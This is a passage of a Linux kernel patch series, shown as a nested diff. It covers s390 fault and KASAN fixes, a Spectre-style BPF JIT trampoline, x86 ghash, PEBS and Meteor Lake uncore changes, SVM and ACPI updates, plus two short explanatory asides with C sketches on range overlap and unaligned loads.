+ 	case VM_FAULT_SIGNAL:
+ 		if (!user_mode(regs))
+-			do_no_context(regs);
++			do_no_context(regs, fault);
+ 		break;
+ 	default: /* fault & VM_FAULT_ERROR */
+ 		if (fault & VM_FAULT_OOM) {
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				pagefault_out_of_memory();
+ 		} else if (fault & VM_FAULT_SIGSEGV) {
+ 			/* Kernel mode? Handle exceptions or die */
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				do_sigsegv(regs, SEGV_MAPERR);
+ 		} else if (fault & VM_FAULT_SIGBUS) {
+ 			/* Kernel mode? Handle exceptions or die */
+ 			if (!user_mode(regs))
+-				do_no_context(regs);
++				do_no_context(regs, fault);
+ 			else
+ 				do_sigbus(regs);
+ 		} else
+@@ -334,7 +359,6 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 	struct mm_struct *mm;
+ 	struct vm_area_struct *vma;
+ 	enum fault_type type;
+-	unsigned long trans_exc_code;
+ 	unsigned long address;
+ 	unsigned int flags;
+ 	vm_fault_t fault;
+@@ -351,9 +375,8 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 		return 0;
+ 
+ 	mm = tsk->mm;
+-	trans_exc_code = regs->int_parm_long;
+-	address = trans_exc_code & __FAIL_ADDR_MASK;
+-	is_write = (trans_exc_code & store_indication) == 0x400;
++	address = get_fault_address(regs);
++	is_write = fault_is_write(regs);
+ 
+ 	/*
+ 	 * Verify that the fault happened in user space, that
+@@ -364,8 +387,6 @@ static inline vm_fault_t do_exception(struct pt_regs *regs, int access)
+ 	type = get_fault_type(regs);
+ 	switch (type) {
+ 	case KERNEL_FAULT:
+-		if (kfence_handle_page_fault(address, is_write, regs))
+-			return 0;
+ 		goto out;
+ 	case USER_FAULT:
+ 	case GMAP_FAULT:
+diff --git a/arch/s390/mm/vmem.c b/arch/s390/mm/vmem.c
+index ee1a97078527b..9a0ce5315f36d 100644
+--- a/arch/s390/mm/vmem.c
++++ b/arch/s390/mm/vmem.c
+@@ -297,7 +297,7 @@ static void try_free_pmd_table(pud_t *pud, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 	pmd = pmd_offset(pud, start);
+@@ -372,7 +372,7 @@ static void try_free_pud_table(p4d_t *p4d, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 
+@@ -426,7 +426,7 @@ static void try_free_p4d_table(pgd_t *pgd, unsigned long start)
+ 	if (end > VMALLOC_START)
+ 		return;
+ #ifdef CONFIG_KASAN
+-	if (start < KASAN_SHADOW_END && KASAN_SHADOW_START > end)
++	if (start < KASAN_SHADOW_END && end > KASAN_SHADOW_START)
+ 		return;
+ #endif
+ 
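
All three vmem.c hunks correct the same inverted interval test. Two half-open ranges overlap exactly when each starts before the other ends; the old condition compared KASAN_SHADOW_START against end the wrong way around, so the guard fired on the wrong ranges. The predicate as a generic sketch:

#include <stdbool.h>

/* Half-open ranges [s1, e1) and [s2, e2) overlap iff each one begins
 * before the other one ends. */
static inline bool ranges_overlap(unsigned long s1, unsigned long e1,
				  unsigned long s2, unsigned long e2)
{
	return s1 < e2 && s2 < e1;
}
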
+diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c
+index af35052d06ed6..fbdba4c306bea 100644
+--- a/arch/s390/net/bpf_jit_comp.c
++++ b/arch/s390/net/bpf_jit_comp.c
+@@ -1393,8 +1393,16 @@ static noinline int bpf_jit_insn(struct bpf_jit *jit, struct bpf_prog *fp,
+ 		/* lg %r1,bpf_func(%r1) */
+ 		EMIT6_DISP_LH(0xe3000000, 0x0004, REG_1, REG_1, REG_0,
+ 			      offsetof(struct bpf_prog, bpf_func));
+-		/* bc 0xf,tail_call_start(%r1) */
+-		_EMIT4(0x47f01000 + jit->tail_call_start);
++		if (nospec_uses_trampoline()) {
++			jit->seen |= SEEN_FUNC;
++			/* aghi %r1,tail_call_start */
++			EMIT4_IMM(0xa70b0000, REG_1, jit->tail_call_start);
++			/* brcl 0xf,__s390_indirect_jump_r1 */
++			EMIT6_PCREL_RILC(0xc0040000, 0xf, jit->r1_thunk_ip);
++		} else {
++			/* bc 0xf,tail_call_start(%r1) */
++			_EMIT4(0x47f01000 + jit->tail_call_start);
++		}
+ 		/* out: */
+ 		if (jit->prg_buf) {
+ 			*(u16 *)(jit->prg_buf + patch_1_clrj + 2) =
+diff --git a/arch/sparc/Kconfig b/arch/sparc/Kconfig
+index 4d3d1af90d521..84437a4c65454 100644
+--- a/arch/sparc/Kconfig
++++ b/arch/sparc/Kconfig
+@@ -283,7 +283,7 @@ config ARCH_FORCE_MAX_ORDER
+ 	  This config option is actually maximum order plus one. For example,
+ 	  a value of 13 means that the largest free memory block is 2^12 pages.
+ 
+-if SPARC64
++if SPARC64 || COMPILE_TEST
+ source "kernel/power/Kconfig"
+ endif
+ 
+diff --git a/arch/x86/crypto/ghash-clmulni-intel_glue.c b/arch/x86/crypto/ghash-clmulni-intel_glue.c
+index 1f1a95f3dd0ca..c0ab0ff4af655 100644
+--- a/arch/x86/crypto/ghash-clmulni-intel_glue.c
++++ b/arch/x86/crypto/ghash-clmulni-intel_glue.c
+@@ -19,6 +19,7 @@
+ #include <crypto/internal/simd.h>
+ #include <asm/cpu_device_id.h>
+ #include <asm/simd.h>
++#include <asm/unaligned.h>
+ 
+ #define GHASH_BLOCK_SIZE	16
+ #define GHASH_DIGEST_SIZE	16
+@@ -54,15 +55,14 @@ static int ghash_setkey(struct crypto_shash *tfm,
+ 			const u8 *key, unsigned int keylen)
+ {
+ 	struct ghash_ctx *ctx = crypto_shash_ctx(tfm);
+-	be128 *x = (be128 *)key;
+ 	u64 a, b;
+ 
+ 	if (keylen != GHASH_BLOCK_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* perform multiplication by 'x' in GF(2^128) */
+-	a = be64_to_cpu(x->a);
+-	b = be64_to_cpu(x->b);
++	a = get_unaligned_be64(key);
++	b = get_unaligned_be64(key + 8);
+ 
+ 	ctx->shash.a = (b << 1) | (a >> 63);
+ 	ctx->shash.b = (a << 1) | (b >> 63);
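
The ghash_setkey() change stops dereferencing the caller's key buffer through a be128 pointer: setkey() buffers carry no alignment guarantee, and a wide load through such a cast can fault on strict-alignment hardware (and is undefined behavior regardless). get_unaligned_be64() reads the bytes individually; a portable equivalent, as a sketch:

#include <stddef.h>
#include <stdint.h>

/* Assemble a big-endian 64-bit value byte by byte: correct for any
 * buffer alignment and any host endianness. */
static uint64_t load_be64(const uint8_t *p)
{
	uint64_t v = 0;

	for (size_t i = 0; i < 8; i++)
		v = (v << 8) | p[i];	/* most significant byte first */
	return v;
}
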
+diff --git a/arch/x86/events/intel/ds.c b/arch/x86/events/intel/ds.c
+index 446d2833efa76..3ff38e7409e3d 100644
+--- a/arch/x86/events/intel/ds.c
++++ b/arch/x86/events/intel/ds.c
+@@ -2,12 +2,14 @@
+ #include <linux/bitops.h>
+ #include <linux/types.h>
+ #include <linux/slab.h>
++#include <linux/sched/clock.h>
+ 
+ #include <asm/cpu_entry_area.h>
+ #include <asm/perf_event.h>
+ #include <asm/tlbflush.h>
+ #include <asm/insn.h>
+ #include <asm/io.h>
++#include <asm/timer.h>
+ 
+ #include "../perf_event.h"
+ 
+@@ -1519,6 +1521,27 @@ static u64 get_data_src(struct perf_event *event, u64 aux)
+ 	return val;
+ }
+ 
++static void setup_pebs_time(struct perf_event *event,
++			    struct perf_sample_data *data,
++			    u64 tsc)
++{
++	/* Converting to a user-defined clock is not supported yet. */
++	if (event->attr.use_clockid != 0)
++		return;
++
++	/*
++	 * Doesn't support the conversion when the TSC is unstable.
++	 * The TSC unstable case is a corner case and very unlikely to
++	 * happen. If it happens, the TSC in a PEBS record will be
++	 * dropped and fall back to perf_event_clock().
++	 */
++	if (!using_native_sched_clock() || !sched_clock_stable())
++		return;
++
++	data->time = native_sched_clock_from_tsc(tsc) + __sched_clock_offset;
++	data->sample_flags |= PERF_SAMPLE_TIME;
++}
++
+ #define PERF_SAMPLE_ADDR_TYPE	(PERF_SAMPLE_ADDR |		\
+ 				 PERF_SAMPLE_PHYS_ADDR |	\
+ 				 PERF_SAMPLE_DATA_PAGE_SIZE)
+@@ -1668,11 +1691,8 @@ static void setup_pebs_fixed_sample_data(struct perf_event *event,
+ 	 *
+ 	 * We can only do this for the default trace clock.
+ 	 */
+-	if (x86_pmu.intel_cap.pebs_format >= 3 &&
+-		event->attr.use_clockid == 0) {
+-		data->time = native_sched_clock_from_tsc(pebs->tsc);
+-		data->sample_flags |= PERF_SAMPLE_TIME;
+-	}
++	if (x86_pmu.intel_cap.pebs_format >= 3)
++		setup_pebs_time(event, data, pebs->tsc);
+ 
+ 	if (has_branch_stack(event)) {
+ 		data->br_stack = &cpuc->lbr_stack;
+@@ -1735,10 +1755,7 @@ static void setup_pebs_adaptive_sample_data(struct perf_event *event,
+ 	perf_sample_data_init(data, 0, event->hw.last_period);
+ 	data->period = event->hw.last_period;
+ 
+-	if (event->attr.use_clockid == 0) {
+-		data->time = native_sched_clock_from_tsc(basic->tsc);
+-		data->sample_flags |= PERF_SAMPLE_TIME;
+-	}
++	setup_pebs_time(event, data, basic->tsc);
+ 
+ 	/*
+ 	 * We must however always use iregs for the unwinder to stay sane; the
+diff --git a/arch/x86/events/intel/uncore.c b/arch/x86/events/intel/uncore.c
+index 459b1aafd4d4a..27b34f5b87600 100644
+--- a/arch/x86/events/intel/uncore.c
++++ b/arch/x86/events/intel/uncore.c
+@@ -1765,6 +1765,11 @@ static const struct intel_uncore_init_fun adl_uncore_init __initconst = {
+ 	.mmio_init = adl_uncore_mmio_init,
+ };
+ 
++static const struct intel_uncore_init_fun mtl_uncore_init __initconst = {
++	.cpu_init = mtl_uncore_cpu_init,
++	.mmio_init = adl_uncore_mmio_init,
++};
++
+ static const struct intel_uncore_init_fun icx_uncore_init __initconst = {
+ 	.cpu_init = icx_uncore_cpu_init,
+ 	.pci_init = icx_uncore_pci_init,
+@@ -1832,6 +1837,8 @@ static const struct x86_cpu_id intel_uncore_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,		&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&adl_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE,		&mtl_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE_L,	&mtl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ATOM_TREMONT_D,	&snr_uncore_init),
+diff --git a/arch/x86/events/intel/uncore.h b/arch/x86/events/intel/uncore.h
+index b363fddc2a89e..b74e352910f45 100644
+--- a/arch/x86/events/intel/uncore.h
++++ b/arch/x86/events/intel/uncore.h
+@@ -587,6 +587,7 @@ void skl_uncore_cpu_init(void);
+ void icl_uncore_cpu_init(void);
+ void tgl_uncore_cpu_init(void);
+ void adl_uncore_cpu_init(void);
++void mtl_uncore_cpu_init(void);
+ void tgl_uncore_mmio_init(void);
+ void tgl_l_uncore_mmio_init(void);
+ void adl_uncore_mmio_init(void);
+diff --git a/arch/x86/events/intel/uncore_snb.c b/arch/x86/events/intel/uncore_snb.c
+index 1f4869227efb9..7fd4334e12a17 100644
+--- a/arch/x86/events/intel/uncore_snb.c
++++ b/arch/x86/events/intel/uncore_snb.c
+@@ -109,6 +109,19 @@
+ #define PCI_DEVICE_ID_INTEL_RPL_23_IMC		0xA728
+ #define PCI_DEVICE_ID_INTEL_RPL_24_IMC		0xA729
+ #define PCI_DEVICE_ID_INTEL_RPL_25_IMC		0xA72A
++#define PCI_DEVICE_ID_INTEL_MTL_1_IMC		0x7d00
++#define PCI_DEVICE_ID_INTEL_MTL_2_IMC		0x7d01
++#define PCI_DEVICE_ID_INTEL_MTL_3_IMC		0x7d02
++#define PCI_DEVICE_ID_INTEL_MTL_4_IMC		0x7d05
++#define PCI_DEVICE_ID_INTEL_MTL_5_IMC		0x7d10
++#define PCI_DEVICE_ID_INTEL_MTL_6_IMC		0x7d14
++#define PCI_DEVICE_ID_INTEL_MTL_7_IMC		0x7d15
++#define PCI_DEVICE_ID_INTEL_MTL_8_IMC		0x7d16
++#define PCI_DEVICE_ID_INTEL_MTL_9_IMC		0x7d21
++#define PCI_DEVICE_ID_INTEL_MTL_10_IMC		0x7d22
++#define PCI_DEVICE_ID_INTEL_MTL_11_IMC		0x7d23
++#define PCI_DEVICE_ID_INTEL_MTL_12_IMC		0x7d24
++#define PCI_DEVICE_ID_INTEL_MTL_13_IMC		0x7d28
+ 
+ 
+ #define IMC_UNCORE_DEV(a)						\
+@@ -205,6 +218,32 @@
+ #define ADL_UNC_ARB_PERFEVTSEL0			0x2FD0
+ #define ADL_UNC_ARB_MSR_OFFSET			0x8
+ 
++/* MTL Cbo register */
++#define MTL_UNC_CBO_0_PER_CTR0			0x2448
++#define MTL_UNC_CBO_0_PERFEVTSEL0		0x2442
++
++/* MTL HAC_ARB register */
++#define MTL_UNC_HAC_ARB_CTR			0x2018
++#define MTL_UNC_HAC_ARB_CTRL			0x2012
++
++/* MTL ARB register */
++#define MTL_UNC_ARB_CTR				0x2418
++#define MTL_UNC_ARB_CTRL			0x2412
++
++/* MTL cNCU register */
++#define MTL_UNC_CNCU_FIXED_CTR			0x2408
++#define MTL_UNC_CNCU_FIXED_CTRL			0x2402
++#define MTL_UNC_CNCU_BOX_CTL			0x240e
++
++/* MTL sNCU register */
++#define MTL_UNC_SNCU_FIXED_CTR			0x2008
++#define MTL_UNC_SNCU_FIXED_CTRL			0x2002
++#define MTL_UNC_SNCU_BOX_CTL			0x200e
++
++/* MTL HAC_CBO register */
++#define MTL_UNC_HBO_CTR				0x2048
++#define MTL_UNC_HBO_CTRL			0x2042
++
+ DEFINE_UNCORE_FORMAT_ATTR(event, event, "config:0-7");
+ DEFINE_UNCORE_FORMAT_ATTR(umask, umask, "config:8-15");
+ DEFINE_UNCORE_FORMAT_ATTR(chmask, chmask, "config:8-11");
+@@ -598,6 +637,115 @@ void adl_uncore_cpu_init(void)
+ 	uncore_msr_uncores = adl_msr_uncores;
+ }
+ 
++static struct intel_uncore_type mtl_uncore_cbox = {
++	.name		= "cbox",
++	.num_counters   = 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_CBO_0_PER_CTR0,
++	.event_ctl	= MTL_UNC_CBO_0_PERFEVTSEL0,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_hac_arb = {
++	.name		= "hac_arb",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_HAC_ARB_CTR,
++	.event_ctl	= MTL_UNC_HAC_ARB_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_arb = {
++	.name		= "arb",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_ARB_CTR,
++	.event_ctl	= MTL_UNC_ARB_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static struct intel_uncore_type mtl_uncore_hac_cbox = {
++	.name		= "hac_cbox",
++	.num_counters   = 2,
++	.num_boxes	= 2,
++	.perf_ctr_bits	= 48,
++	.perf_ctr	= MTL_UNC_HBO_CTR,
++	.event_ctl	= MTL_UNC_HBO_CTRL,
++	.event_mask	= ADL_UNC_RAW_EVENT_MASK,
++	.msr_offset	= SNB_UNC_CBO_MSR_OFFSET,
++	.ops		= &icl_uncore_msr_ops,
++	.format_group	= &adl_uncore_format_group,
++};
++
++static void mtl_uncore_msr_init_box(struct intel_uncore_box *box)
++{
++	wrmsrl(uncore_msr_box_ctl(box), SNB_UNC_GLOBAL_CTL_EN);
++}
++
++static struct intel_uncore_ops mtl_uncore_msr_ops = {
++	.init_box	= mtl_uncore_msr_init_box,
++	.disable_event	= snb_uncore_msr_disable_event,
++	.enable_event	= snb_uncore_msr_enable_event,
++	.read_counter	= uncore_msr_read_counter,
++};
++
++static struct intel_uncore_type mtl_uncore_cncu = {
++	.name		= "cncu",
++	.num_counters   = 1,
++	.num_boxes	= 1,
++	.box_ctl	= MTL_UNC_CNCU_BOX_CTL,
++	.fixed_ctr_bits = 48,
++	.fixed_ctr	= MTL_UNC_CNCU_FIXED_CTR,
++	.fixed_ctl	= MTL_UNC_CNCU_FIXED_CTRL,
++	.single_fixed	= 1,
++	.event_mask	= SNB_UNC_CTL_EV_SEL_MASK,
++	.format_group	= &icl_uncore_clock_format_group,
++	.ops		= &mtl_uncore_msr_ops,
++	.event_descs	= icl_uncore_events,
++};
++
++static struct intel_uncore_type mtl_uncore_sncu = {
++	.name		= "sncu",
++	.num_counters   = 1,
++	.num_boxes	= 1,
++	.box_ctl	= MTL_UNC_SNCU_BOX_CTL,
++	.fixed_ctr_bits	= 48,
++	.fixed_ctr	= MTL_UNC_SNCU_FIXED_CTR,
++	.fixed_ctl	= MTL_UNC_SNCU_FIXED_CTRL,
++	.single_fixed	= 1,
++	.event_mask	= SNB_UNC_CTL_EV_SEL_MASK,
++	.format_group	= &icl_uncore_clock_format_group,
++	.ops		= &mtl_uncore_msr_ops,
++	.event_descs	= icl_uncore_events,
++};
++
++static struct intel_uncore_type *mtl_msr_uncores[] = {
++	&mtl_uncore_cbox,
++	&mtl_uncore_hac_arb,
++	&mtl_uncore_arb,
++	&mtl_uncore_hac_cbox,
++	&mtl_uncore_cncu,
++	&mtl_uncore_sncu,
++	NULL
++};
++
++void mtl_uncore_cpu_init(void)
++{
++	mtl_uncore_cbox.num_boxes = icl_get_cbox_num();
++	uncore_msr_uncores = mtl_msr_uncores;
++}
++
+ enum {
+ 	SNB_PCI_UNCORE_IMC,
+ };
+@@ -1264,6 +1412,19 @@ static const struct pci_device_id tgl_uncore_pci_ids[] = {
+ 	IMC_UNCORE_DEV(RPL_23),
+ 	IMC_UNCORE_DEV(RPL_24),
+ 	IMC_UNCORE_DEV(RPL_25),
++	IMC_UNCORE_DEV(MTL_1),
++	IMC_UNCORE_DEV(MTL_2),
++	IMC_UNCORE_DEV(MTL_3),
++	IMC_UNCORE_DEV(MTL_4),
++	IMC_UNCORE_DEV(MTL_5),
++	IMC_UNCORE_DEV(MTL_6),
++	IMC_UNCORE_DEV(MTL_7),
++	IMC_UNCORE_DEV(MTL_8),
++	IMC_UNCORE_DEV(MTL_9),
++	IMC_UNCORE_DEV(MTL_10),
++	IMC_UNCORE_DEV(MTL_11),
++	IMC_UNCORE_DEV(MTL_12),
++	IMC_UNCORE_DEV(MTL_13),
+ 	{ /* end: all zeroes */ }
+ };
+ 
+diff --git a/arch/x86/events/zhaoxin/core.c b/arch/x86/events/zhaoxin/core.c
+index 949d845c922b4..3e9acdaeed1ec 100644
+--- a/arch/x86/events/zhaoxin/core.c
++++ b/arch/x86/events/zhaoxin/core.c
+@@ -541,7 +541,13 @@ __init int zhaoxin_pmu_init(void)
+ 
+ 	switch (boot_cpu_data.x86) {
+ 	case 0x06:
+-		if (boot_cpu_data.x86_model == 0x0f || boot_cpu_data.x86_model == 0x19) {
++		/*
++		 * Support Zhaoxin CPU from ZXC series, exclude Nano series through FMS.
++		 * Nano FMS: Family=6, Model=F, Stepping=[0-A][C-D]
++		 * ZXC FMS: Family=6, Model=F, Stepping=E-F OR Family=6, Model=0x19, Stepping=0-3
++		 */
++		if ((boot_cpu_data.x86_model == 0x0f && boot_cpu_data.x86_stepping >= 0x0e) ||
++			boot_cpu_data.x86_model == 0x19) {
+ 
+ 			x86_pmu.max_period = x86_pmu.cntval_mask >> 1;
+ 
+diff --git a/arch/x86/include/asm/fpu/sched.h b/arch/x86/include/asm/fpu/sched.h
+index b2486b2cbc6e0..c2d6cd78ed0c2 100644
+--- a/arch/x86/include/asm/fpu/sched.h
++++ b/arch/x86/include/asm/fpu/sched.h
+@@ -39,7 +39,7 @@ extern void fpu_flush_thread(void);
+ static inline void switch_fpu_prepare(struct fpu *old_fpu, int cpu)
+ {
+ 	if (cpu_feature_enabled(X86_FEATURE_FPU) &&
+-	    !(current->flags & PF_KTHREAD)) {
++	    !(current->flags & (PF_KTHREAD | PF_IO_WORKER))) {
+ 		save_fpregs_to_fpstate(old_fpu);
+ 		/*
+ 		 * The save operation preserved register state, so the
+diff --git a/arch/x86/include/asm/fpu/xcr.h b/arch/x86/include/asm/fpu/xcr.h
+index 9656a5bc6feae..9a710c0604457 100644
+--- a/arch/x86/include/asm/fpu/xcr.h
++++ b/arch/x86/include/asm/fpu/xcr.h
+@@ -5,7 +5,7 @@
+ #define XCR_XFEATURE_ENABLED_MASK	0x00000000
+ #define XCR_XFEATURE_IN_USE_MASK	0x00000001
+ 
+-static inline u64 xgetbv(u32 index)
++static __always_inline u64 xgetbv(u32 index)
+ {
+ 	u32 eax, edx;
+ 
+@@ -27,7 +27,7 @@ static inline void xsetbv(u32 index, u64 value)
+  *
+  * Callers should check X86_FEATURE_XGETBV1.
+  */
+-static inline u64 xfeatures_in_use(void)
++static __always_inline u64 xfeatures_in_use(void)
+ {
+ 	return xgetbv(XCR_XFEATURE_IN_USE_MASK);
+ }
+diff --git a/arch/x86/include/asm/microcode.h b/arch/x86/include/asm/microcode.h
+index 74ecc2bd6cd0f..79b1d009e34e4 100644
+--- a/arch/x86/include/asm/microcode.h
++++ b/arch/x86/include/asm/microcode.h
+@@ -127,13 +127,13 @@ static inline unsigned int x86_cpuid_family(void)
+ #ifdef CONFIG_MICROCODE
+ extern void __init load_ucode_bsp(void);
+ extern void load_ucode_ap(void);
+-void reload_early_microcode(void);
++void reload_early_microcode(unsigned int cpu);
+ extern bool initrd_gone;
+ void microcode_bsp_resume(void);
+ #else
+ static inline void __init load_ucode_bsp(void)			{ }
+ static inline void load_ucode_ap(void)				{ }
+-static inline void reload_early_microcode(void)			{ }
++static inline void reload_early_microcode(unsigned int cpu)	{ }
+ static inline void microcode_bsp_resume(void)			{ }
+ #endif
+ 
+diff --git a/arch/x86/include/asm/microcode_amd.h b/arch/x86/include/asm/microcode_amd.h
+index ac31f9140d07d..e6662adf3af4d 100644
+--- a/arch/x86/include/asm/microcode_amd.h
++++ b/arch/x86/include/asm/microcode_amd.h
+@@ -47,12 +47,12 @@ struct microcode_amd {
+ extern void __init load_ucode_amd_bsp(unsigned int family);
+ extern void load_ucode_amd_ap(unsigned int family);
+ extern int __init save_microcode_in_initrd_amd(unsigned int family);
+-void reload_ucode_amd(void);
++void reload_ucode_amd(unsigned int cpu);
+ #else
+ static inline void __init load_ucode_amd_bsp(unsigned int family) {}
+ static inline void load_ucode_amd_ap(unsigned int family) {}
+ static inline int __init
+ save_microcode_in_initrd_amd(unsigned int family) { return -EINVAL; }
+-static inline void reload_ucode_amd(void) {}
++static inline void reload_ucode_amd(unsigned int cpu) {}
+ #endif
+ #endif /* _ASM_X86_MICROCODE_AMD_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 91447f018f6e4..117e4e977b55d 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -54,6 +54,10 @@
+ #define SPEC_CTRL_RRSBA_DIS_S_SHIFT	6	   /* Disable RRSBA behavior */
+ #define SPEC_CTRL_RRSBA_DIS_S		BIT(SPEC_CTRL_RRSBA_DIS_S_SHIFT)
+ 
++/* A mask for bits which the kernel toggles when controlling mitigations */
++#define SPEC_CTRL_MITIGATIONS_MASK	(SPEC_CTRL_IBRS | SPEC_CTRL_STIBP | SPEC_CTRL_SSBD \
++							| SPEC_CTRL_RRSBA_DIS_S)
++
+ #define MSR_IA32_PRED_CMD		0x00000049 /* Prediction Command */
+ #define PRED_CMD_IBPB			BIT(0)	   /* Indirect Branch Prediction Barrier */
+ 
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index 67c9d73b31faa..d8277eec1bcd6 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -835,7 +835,8 @@ bool xen_set_default_idle(void);
+ #endif
+ 
+ void __noreturn stop_this_cpu(void *dummy);
+-void microcode_check(void);
++void microcode_check(struct cpuinfo_x86 *prev_info);
++void store_cpu_caps(struct cpuinfo_x86 *info);
+ 
+ enum l1tf_mitigations {
+ 	L1TF_MITIGATION_OFF,
+diff --git a/arch/x86/include/asm/reboot.h b/arch/x86/include/asm/reboot.h
+index 04c17be9b5fda..bc5b4d788c08d 100644
+--- a/arch/x86/include/asm/reboot.h
++++ b/arch/x86/include/asm/reboot.h
+@@ -25,6 +25,8 @@ void __noreturn machine_real_restart(unsigned int type);
+ #define MRR_BIOS	0
+ #define MRR_APM		1
+ 
++void cpu_emergency_disable_virtualization(void);
++
+ typedef void (*nmi_shootdown_cb)(int, struct pt_regs*);
+ void nmi_panic_self_stop(struct pt_regs *regs);
+ void nmi_shootdown_cpus(nmi_shootdown_cb callback);
+diff --git a/arch/x86/include/asm/special_insns.h b/arch/x86/include/asm/special_insns.h
+index 35f709f619fb4..c2e322189f853 100644
+--- a/arch/x86/include/asm/special_insns.h
++++ b/arch/x86/include/asm/special_insns.h
+@@ -295,7 +295,7 @@ static inline int enqcmds(void __iomem *dst, const void *src)
+ 	return 0;
+ }
+ 
+-static inline void tile_release(void)
++static __always_inline void tile_release(void)
+ {
+ 	/*
+ 	 * Instruction opcode for TILERELEASE; supported in binutils
+diff --git a/arch/x86/include/asm/virtext.h b/arch/x86/include/asm/virtext.h
+index 8757078d4442a..3b12e6b994123 100644
+--- a/arch/x86/include/asm/virtext.h
++++ b/arch/x86/include/asm/virtext.h
+@@ -126,7 +126,21 @@ static inline void cpu_svm_disable(void)
+ 
+ 	wrmsrl(MSR_VM_HSAVE_PA, 0);
+ 	rdmsrl(MSR_EFER, efer);
+-	wrmsrl(MSR_EFER, efer & ~EFER_SVME);
++	if (efer & EFER_SVME) {
++		/*
++		 * Force GIF=1 prior to disabling SVM to ensure INIT and NMI
++		 * aren't blocked, e.g. if a fatal error occurred between CLGI
++		 * and STGI.  Note, STGI may #UD if SVM is disabled from NMI
++		 * context between reading EFER and executing STGI.  In that
++		 * case, GIF must already be set, otherwise the NMI would have
++		 * been blocked, so just eat the fault.
++		 */
++		asm_volatile_goto("1: stgi\n\t"
++				  _ASM_EXTABLE(1b, %l[fault])
++				  ::: "memory" : fault);
++fault:
++		wrmsrl(MSR_EFER, efer & ~EFER_SVME);
++	}
+ }
+ 
+ /** Makes sure SVM is disabled, if it is supported on the CPU
+diff --git a/arch/x86/kernel/acpi/boot.c b/arch/x86/kernel/acpi/boot.c
+index 907cc98b19380..518bda50068cb 100644
+--- a/arch/x86/kernel/acpi/boot.c
++++ b/arch/x86/kernel/acpi/boot.c
+@@ -188,6 +188,17 @@ static int acpi_register_lapic(int id, u32 acpiid, u8 enabled)
+ 	return cpu;
+ }
+ 
++static bool __init acpi_is_processor_usable(u32 lapic_flags)
++{
++	if (lapic_flags & ACPI_MADT_ENABLED)
++		return true;
++
++	if (acpi_support_online_capable && (lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++		return true;
++
++	return false;
++}
++
+ static int __init
+ acpi_parse_x2apic(union acpi_subtable_headers *header, const unsigned long end)
+ {
+@@ -212,6 +223,10 @@ acpi_parse_x2apic(union acpi_subtable_headers *header, const unsigned long end)
+ 	if (apic_id == 0xffffffff)
+ 		return 0;
+ 
++	/* don't register processors that cannot be onlined */
++	if (!acpi_is_processor_usable(processor->lapic_flags))
++		return 0;
++
+ 	/*
+ 	 * We need to register disabled CPU as well to permit
+ 	 * counting disabled CPUs. This allows us to size
+@@ -250,9 +265,7 @@ acpi_parse_lapic(union acpi_subtable_headers * header, const unsigned long end)
+ 		return 0;
+ 
+ 	/* don't register processors that can not be onlined */
+-	if (acpi_support_online_capable &&
+-	    !(processor->lapic_flags & ACPI_MADT_ENABLED) &&
+-	    !(processor->lapic_flags & ACPI_MADT_ONLINE_CAPABLE))
++	if (!acpi_is_processor_usable(processor->lapic_flags))
+ 		return 0;
+ 
+ 	/*
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 16d8e43be7758..f54992887491e 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
